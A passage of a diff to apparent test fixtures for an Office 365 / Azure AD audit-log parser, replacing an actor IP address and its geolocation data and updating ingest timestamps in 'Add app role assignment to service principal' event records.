APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125181300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.2593808Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117959\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a73c1c7e-5591-4912-94cc-527ad6f48ed8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -12405,25 +11343,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -12437,7 +11357,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -12573,7 +11493,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -12585,12 +11505,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036429500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125185500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -12616,25 +11536,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -12648,7 +11550,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -12784,7 +11686,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -12796,12 +11698,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036434300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-9